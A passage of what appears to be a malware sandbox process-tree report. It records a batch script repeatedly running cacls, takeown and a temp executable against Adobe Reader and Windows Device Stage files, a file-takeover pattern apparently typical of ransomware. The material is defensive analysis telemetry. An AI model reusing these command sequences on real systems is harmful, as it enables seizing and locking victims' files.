C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵
- Modifies file permissions
PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:1236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "can03.ths" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "can03.ths" -nobanner4⤵PID:556
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵
- Modifies file permissions
PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:112
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:308
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵
- Modifies file permissions
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:1448
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:1144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:1356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:2000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:576
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1116
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵
- Modifies file permissions
PID:608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:668
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵
- Modifies file permissions
PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵
- Modifies file permissions
PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "zy______.pfm" -nobanner3⤵PID:1144
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:1536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "brt.fca" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "brt.fca" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "eng.hyp" -nobanner3⤵PID:656
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "eng.hyp" -nobanner4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵
- Modifies file permissions
PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:396
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1788
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "superbar.png" -nobanner3⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "superbar.png" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:2028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "pmd.cer" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "pmd.cer" -nobanner4⤵PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "pdf.gif" -nobanner3⤵PID:1456
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "pdf.gif" -nobanner4⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1436
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "watermark.png" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "watermark.png" -nobanner4⤵PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:1068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵
- Modifies file permissions
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "server_issue.gif" -nobanner4⤵PID:2024
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:1356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:112
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:1436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "create_form.gif" -nobanner3⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "create_form.gif" -nobanner4⤵PID:536
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "info.gif" -nobanner3⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "info.gif" -nobanner4⤵PID:616
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:396
-
-
